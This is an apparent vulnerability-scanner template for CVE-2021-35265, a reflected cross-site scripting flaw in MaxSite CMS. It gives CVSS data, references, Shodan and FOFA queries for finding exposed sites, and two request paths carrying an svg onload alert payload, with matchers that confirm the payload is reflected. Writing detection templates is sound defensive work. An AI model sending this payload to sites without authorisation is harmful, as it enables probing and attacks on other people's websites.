id: CVE-2021-35265

info:
  name: MaxSite CMS > V106 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page."
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265).
  reference:
    - https://github.com/maxsite/cms/issues/414#issue-726249183
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35265
    - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35265
    cwe-id: CWE-79
    epss-score: 0.00141
    epss-percentile: 0.4979
    cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: maxsite
    product: maxsite_cms
    shodan-query:
      - html:'content="MaxSite CMS'
      - http.html:'content="maxsite cms'
    fofa-query: body='content="maxsite cms'
  tags: cve2021,cve,maxsite,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E'
      - '{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '><svg/onload=alert(document.domain)>'

      - type: word
        part: body
        words:
          - 'mso-comments-rss">RSS</a>'
          - 'MaxSite CMS'
          - 'feed"><span>RSS</span>'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402201d7fa96b7c5ff37d380a8b439c8bfcc2d9132bcbc4556438c5827a6d354d11db02200b23810a8edd21ef79c6c6b5d175eabf0b0f026d407c0144b94e6da54024e7b1:922c64590222798bb761d5b6d8e72950